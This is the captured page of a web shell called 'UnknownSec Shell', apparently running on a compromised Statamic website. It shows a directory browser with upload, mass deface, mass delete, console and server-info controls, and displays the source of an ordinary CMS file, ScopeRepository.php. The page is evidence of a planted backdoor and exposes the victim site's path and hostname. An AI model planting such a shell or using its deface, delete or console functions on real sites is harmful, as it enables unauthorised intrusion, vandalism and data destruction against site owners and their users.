shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolasweb.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Query
/
Scopes
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
ScopeRepository.php
<?php namespace Statamic\Query\Scopes; class ScopeRepository { private $removed = []; public function all() { return app('statamic.scopes') ->map(fn ($class) => app($class)) ->reject(fn ($class) => in_array($class->handle(), $this->removed)) ->filter() ->values(); } public function find($key, $context = []) { if (in_array($key, $this->removed)) { return; } if (! $scope = app('statamic.scopes')->get($key)) { return; } $scope = app($scope); if (! $scope) { return; } if (! method_exists($scope, 'context')) { return $scope; } return $scope->context($context); } public function filters($key, $context = []) { return $this->all() ->filter(fn ($filter) => $filter instanceof Filter) ->each->context($context) ->filter->visibleTo($key) ->values(); } public function remove(string $handle) { $this->removed[] = $handle; return $this; } }
© 2026 UnknownSec